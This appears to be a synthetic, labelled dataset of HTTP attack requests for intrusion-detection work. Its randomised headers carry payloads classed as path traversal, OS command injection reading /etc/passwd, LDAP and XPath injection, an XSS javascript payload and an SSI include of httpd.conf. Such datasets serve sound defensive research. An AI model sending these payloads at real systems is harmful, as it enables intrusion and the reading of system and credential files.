GET /gt/agfojnftowunhgtlieee/5xp_./tFmihLafrftl607sly/Jr5lformxwnode/utzcarcfdq.mdb?idV=binthGesa&ft=62&9nobdlap=i+yn4rdnEetatnbn2rvu&ee3tttgtm5a=aLi&bBeS5UvR=dnhsogjktviltp&rlkti2=s+aioehttps1yTsaaaise&VVSTgSDa=RoxHehj%27+or++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i++%2B+j+%2B+k+%2B++l++++%2B+1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+%27nrojaa%27%3D%27+eylep%27++++or&seonp0zata=06981428&A36aeo4xsi=tTco+thte6t3irt&Ti8bz2bocetwTi=Kbiooirudoef&Tyyse=iclea HTTP/1.1
Host: www.rdAehst.net
Connection: ui9eirll
Accept: */*
Accept-Charset: big5;q=0.2, iso-8859-5;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-stale=19414
Client-ip: 154.110.51.106
Cookie: mochaTMvusrW=682039;ep4ep6=2250212;GF3nAdeleteopencg4C_=s ecPE0t
Cookie2: $Version="74"
Date: Tue, 30 May 06 21:56:41 UTC
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest uri=http://eTtMgqe.cz/sLaelaor/t92iw.txt
Range: 2547-43,-89111,-56260
Referer: http://www.estcetPr.cz/8gttal/enghwos/7li6qto.aspx
TE: trailers
Trailer: User-Agent
User-Agent: estura (eiPGB-B; v3Ic@0_6l; iWybyXIryV; rFWrn.q; fr.R768F0l)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 www.di78rIn.jpeg, 0.3 2.222.163.211
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 4777989282549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48888
Start - Id: 45194
class: PathTransversal
GET /./? HTTP/1.0
Host: www.8Eens9iifd.cz:80
Connection: yenhb
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo-zf8shpi, eN-6i;q=0.0, a-Eb;q=0.6, fe-LsseeoSt;q=0.3
Cache-Control: max-stale
Client-ip: 145.145.12.214
Cookie: fcmNRns=9;yrohs3aol=863346;eeuuettlrptdv7=ifqopnmd2haFtna
Cookie2: $Version="339"
Date: Sat, 26 Apr 08 24:52:59 GMT
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: "cjjCV@@Knz4SS56Rr"
If-None-Match: *
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8730
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM dGVrbm5jbmJ4Ymhvb3RzbGFkTGZob29sQ2V3bnN0NnRuZWNscHRkNmI=
Range: 338-,-31040,26925-
Referer: http://b2sa.cz/aqrss/e9iF1ren.jsp
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/4.8 (compatible; mverwe3; Windows NT; eo6i; tftl; sphtryt)
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: HTTP/4.1 www.udmdh.png, 4.5 117.21.158.129
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 12.15.76.12
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45194
Start - Id: 43524
class: OsCommanding
GET /eiih8o/7tt2xzrQKYHhgAi/uigR-07obD@LjKmcqE/ccaIh/vkJn7srZ8l856q/SPDEuiKl0bFphpunion/blPhuotm/oWMdqw8favIqpUQb/.NjTHbIr/ddvsoonfteHohI9tZwe/wDai7momA1U58Q7EaUi.css?ie9a=%2Bote&cINunion=%7C+++cat+%2Fetc%2Fpasswd&lc=golDnqou7 HTTP/1.0
Host: 227.27.59.20
Connection: close
Accept: image/*;q=0.7, image/gif;q=0.3
Accept-Charset: iso-8859-4;q=0.3, x-mac-greek, gb2312;q=0.2, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: tba7uc-mcwl;q=0.2, sntss-da3sse;q=0.1, T-rl2ddjss
Cache-Control: max-age=84410
Client-ip: 254.18.78.75
Cookie: xs=Ihhqe%urrgntei;tubostt=803
Cookie2: $Version="241"
Date: Fri, 20 Aug 04 21:36:17 UTC
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: rewl
From: ioojil@heyq.net
If-Modified-Since: Mon, 07 Sep 09 24:02:13 UTC
If-Unmodified-Since: Thu, 23 Apr 09 16:29:47 CET
If-Match: *
If-None-Match: "wnlTDEI15qNxuXbo"
If-Range: Thu, 26 Mar 09 21:13:17 UTC
Max-Forwards: 056
MIME-Version: 3.5
Pragma: unosnta9=cedd9naE
Proxy-Authorization: NTLM bHNwMmNsQ2JpT3RubWVzZmFpdGtpaG9sZGlPSGlpdUVoY28=
Authorization: NTLM a2ZjV3RsaWw3dzFydmluYXQwTDhydlNpdHRhclRwdGRybmVyemFz
Range: -2781,-259,93-77910
Referer: http://ctheia.st/inhpr/4ftetlob/INqC/9dw61eoT.jsp
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: r7kAlSHOE2 http://www.hxldht.uk
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 956x530
Via: 8.2 www.rlonRrlt.tiff:87527, HTTP/2.3 236.72.8.74
Transfer-Encoding: gzip
Upgrade: itme/0.9
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43524
Start - Id: 46290
class: PathTransversal
GET /CK9IEY9f/9VSFsdcPstyleo@Dqof/YAeutdprgg/fn6ntdflcoioGimaio/emscasg7zrtpNb7/aBUk1U1xyppknl/xi/g8xVKwIIJJ0w@j/e-oJWY5_4s@Hjk/fdotiikee7qzndr09l/Aihh62mh6Ahrr87r/hUjOuhw.T-AaF.html?Ioo=%2F%2C%2C%2C%2FMhla%2FtCg0en%2Fpasswd&jsofdqc=Orjelc%3Fai&xpaieous=d&upgutetohob=gQ3&lmshDeesep=e7at&gidxasm=7433088902&rAntdpe=ofnd69mtloeue&utt=retl43acmnt%40ngs&nGe5c6cactk=a&ens4=792151151&ItmpodB=108&Moq4p3j=327695 HTTP/1.0
Host: www.e9ttzhe.uk:80
Connection: 9ih7raae
Accept: video/mpeg;q=0.5, video/quicktime, text/html
Accept-Charset: *;q=0.2
Accept-Encoding: identity, gzip;q=0.6, identity, deflate, gzip
Accept-Language: luaulam-1;q=0.8, crj-ntt8bk9;q=0.7
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: dnw5s71H=&iframebineseRav]ANe2si;jegdeTiv=:i
Cookie2: $Version="38"
Date: Fri, 09 Feb 07 04:29:03 UTC
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Sat, 12 Apr 08 03:58:45 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 56
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic Ym8zRHhlTjp0VURo
Range: 5-,07-2
Referer: /stsMrn/ahptazm/mequcc/oiafnn.js
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (compatible; hfhao; Linux i386; rnialwitt; leweade; etexh4e)
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.6 215.163.107.69, 9.1 www.m4abG.shtml, 4ozf/9.8 62.151.149.157
Transfer-Encoding: gzip
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 966 120.240.162.4:31750 "00mbdoaEom" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46290
Start - Id: 38962
class: LdapInjection
GET /woa7BGvdSaIYor/9pPUNwherejZYsystemd/mvtsup.html?dac1iio=seSnaa&ithnaefyyh=cs5k1dW&eeteerJhUto=Qtota&8see73=oaH3xst5&CBwget-Iw9Z18=57411062&65B0gIci=eiGOM23RFp&ncr1u=tubfdSerft9aatao&06xXd8VO=o&Oiqle=844648838&iiiithc0Isoftan=ed+rc&icnanyc=%29%28++++%7C++%28Rr6th%3D7et*%29&e6dJaisl=fiocm&qwd8Z2passwd0.QS=4 HTTP/1.0
Host: www.tlrs.de
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, x-mac-cyrillic;q=0.2, windows-1255;q=0.7, hz-gb-2312, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 65.168.89.85
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="4"
Date: Sun, 07 Mar 04 01:42:51 CET
ETag: W/"CWyyv9@t_OHQUFO"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 24 Apr 08 12:29:45 CET
If-Unmodified-Since: Sat, 01 Dec 07 04:42:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 082
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -764,-7
Referer: http://www.1rrea.de/eOtiio/eceans.jsp
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 2.7; kx-xp; rv:2.6.2) Gecko/59367541
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.2 www.6rlelaqr.htm:661
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38962
Start - Id: 38080
class: LdapInjection
GET /g-DXwQY/oAe.css?Un5JQ=emj-l6H&grWs_kphrmM_o=Tnamrisa&formxbscript=af&yQVincludeVE_=iMgnebhEaor+&eLif-Qkkgn=fnetegwe4em&tiNleii=Gcopa5aiYHoacte&2emromsnnSoiauw=gawp-0l&gNyspumcc0=Dhv%3Dhte8edelsin&yneAruOtEhtBmg=roc&qh=kZbe8i+v&pne4tEzah=9afon%29%28+++%7C++++%28hwnjn%3D*%29 HTTP/1.1
Host: 117.39.102.108
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, utf-7
Accept-Encoding: 
Accept-Language: t6ebuseo-3r, lafrdotn-oneif
Cache-Control: only-if-cached
Client-ip: 114.76.49.126
Cookie: hgg=aaiUu;decho;xuaeosxisfuhO=4pieoneo;7gricLasaytteu=oxesr7ihaanaanmD5;d8aigye5ia2soe=held
Cookie2: $Version="085"
Date: Sat, 27 May 06 13:14:32 CET
ETag: "fRIWIo15XiAUFyBQ"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Sun, 25 Jul 04 18:05:22 CET
If-Unmodified-Since: Wed, 27 Dec 06 09:34:02 CET
If-Match: "F8_XYkqmanryTG2ySEc"
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
If-Range: Sun, 15 Mar 09 02:41:06 CET
Max-Forwards: 8
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Digest realm
Range: 77-,76-
Referer: http://www.necec9s.fr/1ae8l8.png
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.8 (Windows; U; WinNT 1.8; ud-ud; rv:9.8.9) Gecko/36636148
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.3 www.gpntn.shtml
Transfer-Encoding: identity
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 67.89.141.76
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38080
Start - Id: 50043
class: XPathInjection
PUT /iQ.Vfghk@z/L96.vhttpW4L/iY3OGpD6TccXbg-eSflm/aSxZder3ZK/eoKdrfqjSmliQr8QIjK1/e_TxqYEX9Sq0@THkKlyd/h9lkSSoZbl6VSJYzZ/k9d9G.m2BtsM9v6pdNc8/e.gfcDEa/ocvI.css? HTTP/1.0
Content-Length: 6
Content-Language: tcheE,bore6m
Content-Encoding: identity
Content-Location: http://www.deso.be/avgo/tliEe/ii4zhti/prt1o8.bin
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Aug 04 16:41:46 UTC
Host: 190.91.81.232:80
Connection: keep-alive
Accept: image/gif;q=0.9, image/*;q=0.8, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: OeoYl'] |     P    | //user[   name/text(  )=  'yw
Client-ip: 179.211.249.175
Cookie: o7ELtoseaay=434979;bM5pfap08input=154806418;nSmd=4619427218
Date: Tue, 06 Dec 05 02:06:57 CET
Expect: pxoth4g=asopr;epfslshe=zeyw
If-None-Match: *
Max-Forwards: 2495
Pragma: no-cache
Authorization: NTLM bm1oYXVXY2U0b29kYnh1YXhndDYyZW1ncHRuYWFvZzRuZHRlbQ==
Referer: /ee5at/lri0b.html
TE: chunked;q=0.5
User-Agent: bDqrvO http://www.pnn1dalo.it
Via: 9.1 8.23.82.234
Warning: 797 www.hahtsh.htm "a6t6tidmteLue8EsDt" 

.R3Q=t

End - Id: 50043
Start - Id: 46964
class: XSS
POST /aUel.eH.P805@l/tinli5en0rig/9r4t5a/ocYwCbx6hKmGP.XE6Wm7/qNNyp82N/ntancrisee/efIDEVLu1e/sm@T0tB-Ib/eomOlmatittmw.css? HTTP/1.1
Content-Length: 222
Content-Language: x
Content-Encoding: deflate
Content-Location: http://www.ar1udhu.cz/Fh1q/ns9f/tasto.asp
Content-MD5: YTdvdGZobzl0b2xodDJlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Mar 05 21:31:06 UTC
Last-Modified: Wed, 03 Jun 09 07:58:51 UTC
Host: 9.115.142.66:960
Connection: hMrttnt
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=508
Client-ip: 248.152.241.195
Cookie: onelna0qRaaxh2=475197;thtSSu4taw=me;fseseiasOh8s=8yt|m
Cookie2: $Version="609"
Date: Thu, 23 Feb 06 21:51:20 GMT
ETag: "6g5uOF.cJy1pW@7l6"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Tue, 19 Jan 10 19:55:27 UTC
If-Unmodified-Since: Fri, 22 Aug 08 06:33:22 CET
If-Match: *
If-None-Match: "adlZDISFzsbWRSS9j."
If-Range: Tue, 06 Jun 06 19:00:08 UTC
Max-Forwards: 25
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ff89aaf3
Authorization: NTLM cmlycm1pd3N5bGJ6ZFM4S3NkZzBwaGJpbmFlZWlhaW1udGVkYW9lbmlm
Range: 7983-,306453-6827,8100-07
Referer: http://www.g8posif.be/ewi03rcr/sctbdiii/woydn/ariqcots.mpg
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 2.2; of-ni; rv:2.5.8) Gecko/96011173
UA-CPU: 68000
UA-Disp: 698,9133,32
UA-OS: Solaris
UA-Color: color16
Via: 0.8 42.146.255.208, 1.9 www.A5eni.gif
Transfer-Encoding: elsrea
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rnyia7kad3Im0=5328&_PY-dRsOCy3j=057886&orcatrtq=etjeval&Texec3updateV3A7V=T:ps remetaae&1Hlmlo0i3tigfhe=eee rconnect&hmbkn=etotgrnnesef&dote=<bgsound    src = "    javascript:[alert ('nld');]" >

End - Id: 46964
Start - Id: 39569
class: SSI
POST /ASTzSSB4_aPz47h/3sUi/uybinqEgOor98jJz/iv/iDreenenmo/3edoeitn7styResiacA/rja2efilbafrt9fh/y4ZnBGrNBf/disx.deZdxSI0WANS3.jpg? HTTP/1.1
Content-Length: 132
Content-Language: edeethee,ih,dtnaqox
Content-Encoding: identity
Content-Location: /oevo/Faena6Dl/vlitRbu.mp3
Content-MD5: ZXBjdzVobjVkdXJjZWhhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 11 Oct 05 21:24:02 GMT
Host: www.erIhid.be
Connection: close
Accept: application/postscript, application/*;q=0.7, text/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress, compress
Accept-Language: y-a3a, a-fts;q=0.0, rsjpe-nuhtsh;q=0.8, o-eaasce
Cache-Control: max-stale
Client-ip: 222.71.177.248
Cookie: eaue=8;Deftvrem=vni4r82suueaax
Cookie2: $Version="24"
Date: Fri, 12 Oct 07 18:14:01 GMT
ETag: W/"LJ5rIjuNm61wzqPu5"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: ".pWFlEZtIRHo2b2NVp"
If-None-Match: "euxEby7u13viOEm-J"
If-Range: Fri, 26 Jan 07 08:21:10 UTC
Max-Forwards: 77
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM UjRpaXRwbWYxb2phZG9lbmE5R3dvYmVuOXVvaHY4aXJhenQ=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: http://www.sieni.cz/ksbstey/btvn/skpteNmg.php3
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 3.0; ao-ib; rv:1.0.8) Gecko/76600882
UA-Disp: 9131,8742,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 645x141
Via: HTTP/0.0 120.190.157.251:7441
Transfer-Encoding: gzip
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Forwarded-For: 36.239.161.183
X-Serial-Number: 7950474453739700165
----: ------------------
~~~~~: ~~~~~~~~~~

NRsiiknsS9=<!-- #include    virtual="/etc/httpd/httpd.conf"   -->&insertYOqmocha=zgd&sr=adminnph-&ULaeu0b=ndneeG

End - Id: 39569
Start - Id: 45165
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.0oAtthme.cz:80
Connection: dbgtsoHa
Accept: */*
Accept-Charset: windows-1255;q=0.3, isiri-3342, windows-1253, cp-936;q=0.7
Accept-Encoding: identity;q=0.3
Accept-Language: ps-ao2o;q=0.2, btin8-tcpi;q=0.1
Cache-Control: only-if-cached
Client-ip: 3.86.215.159
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Sat, 06 Jun 09 22:16:28 CET
ETag: W/"A2GfweKXm_TLmbvnWY"
Expect: 100-continue
From: hdOf9re@eutwEh.uk
If-Modified-Since: Sun, 29 Jan 06 23:54:29 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 372
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: /ne2ngax/mueuho.mp3
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/6.3 (X11; U; Open BSD i386 3.0; el-ge; rv:2.3.9) Gecko/06723730
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45165
Start - Id: 45837
class: PathTransversal
GET /law-KTQa/al2pXP7ZrcQ45kgbU/nOypxpbluMC2.12eo6/NECkcArLhttpYujXhttpV/cX6acDgExlni2x8se/cY.WMKgnA7/8xlpwXF27ZR/ni7bKpO/cb@4cLUxZowgetN/FPeUZ1lWhHO0CUW.css?5Cpn4fsamxcvN=hte5o&4LfcA=-opnsbTduxbhvb&3l7o3a=oiignode&cDr=ent%25&ehuei14Ie4os=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fstat%2Fgeasetet%2Fesalgelaar%2Ftrelnsdeto.nsf&ai=wHUbAYnDFB-&pliae5HpneoRi=e%3Cae&as=iktb1aiaaLtclsgroup+byivsv&kn=01554&at47mr0o=iizbrssaTe&rEh9B=2&wil=7175&huan=ihs+%28t+1m3ya%28jG%5B3e&4eevayc0ehi8=+l&br=782th HTTP/1.0
Host: www.yuyga2l.net
Connection: uaheaMd
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 103.226.207.78
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="476"
Date: Sun, 09 Sep 07 21:30:17 UTC
ETag: "pcuOXffDgOU2k3R9Y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: "ziEfDRGDlKnB.7Xb_W"
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 768
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: 321-0
Referer: /beyaoe.css
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: rnc8endNeteOT0lelt
UA-CPU: x86
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: ts0lte
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45837
Start - Id: 43168
class: OsCommanding
GET /Thr/hdTsnraTdgearlnu/iB7EqfSN/lLbb9fpJvGJ.-7KHohnM/7uwJimgmps0qhpq/8cjtuq4oae0parise/nr/s3saetoaepnATeb4we1/0K1p-kRTDxi-9.4dQeL/_bh/dBOwud3F8yR/e.qr1S.mdb?kmbaSiCwNitEd6=5OV4noeQ&oA8ookye=42&trdsnd=%250a+++++cat+++++%250a++%2Fetc%2Fpasswd+%250a HTTP/1.1
Host: www.trtsedng.cz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3gitem-enr, t-tooetRsr;q=0.2, lpcMsosb-ueelmr;q=0.2
Cache-Control: oa='GoneGlr'
Client-ip: 229.240.5.133
Cookie: avcthwztsEmtNe=mlga3k<s hc[ rCvbscript\olink;xDjaccess_log39-g=S7vtrd;lxIdrou98biah8g=391;jeh=nCOnnc6bdhntwa;awe=885561;ans=sla7mcqps2mn
Cookie2: $Version="045"
Date: Sun, 01 May 05 18:31:18 CET
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: ritelu@ohts9eaeot.uk
If-Modified-Since: Mon, 17 Jul 06 04:42:59 GMT
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "M5CrER4YTPkml4C"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Mon, 03 Jul 06 22:31:31 GMT
Max-Forwards: 063
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 332370-1588,656-95
Referer: http://rssntRe.org/evnxeu.php4
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 4.5; 9g-hs; rv:9.2.1) Gecko/49646508
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43168
Start - Id: 49116
class: XPathInjection
GET /eiv/amKaI.swf?nURthahek=rbae%27++++or++6+++++%3C+++count%28path%2Fchild%3A%3A*%29++++or++++%27nszes%27++%3D+%27&rdhqefrhKqf=079298728&bnsS=fcoaOdnhise&seaDi5nduoi=8accept6u&t2rys4pUar1=4067858&ma=t4htstr&id=ucbn63ex+r+&s06ntvspso=00&aRStsr2t0mAov=644&d5eelw5cfi=3eEcz&ecls8eR=7f6CiiHey&te=+ona6 HTTP/1.0
Host: www.okrkstr.ch:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.8, x-mac-japanese;q=0.2
Accept-Encoding: deflate;q=0.2, identity;q=0.5
Accept-Language: 4aeaeulE-o;q=0.7, emap0z-hx, oCN9iast-ieq, wsa-uiirted;q=0.7
Cache-Control: max-stale=86
Client-ip: 140.0.134.125
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="259"
Date: Thu, 30 Mar 06 21:28:28 CET
ETag: "vzdQL-TvdBmv@UeHw"
Expect: htduh=nedueein;lnyke
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 25 Jul 06 24:01:13 UTC
If-Unmodified-Since: Sat, 02 Apr 05 16:06:36 UTC
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: *
If-Range: "6IbXyIqqMh60@BPT"
Max-Forwards: 420
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest username="lu8nnsh"
Authorization: NTLM MHJzbmloN3RyNGF0dDR0Z1JhdW9pb3dnakhob2hpOW9hb3R6c0lkcw==
Range: 1-
Referer: http://www.iOeeeeqo.cz/hXhuaaeh.cgi
TE: chunked;q=0.3,trailers,deflate;q=0.5
Trailer: Referer
User-Agent: mnjZ9zJpi http://www.itesreih.gov
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: rlace/3.0, hoSa/9.4, jas/6.6, iAeed/2.7
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 130.41.59.128
X-Serial-Number: 68685203672775561
----: ---------------------------------------
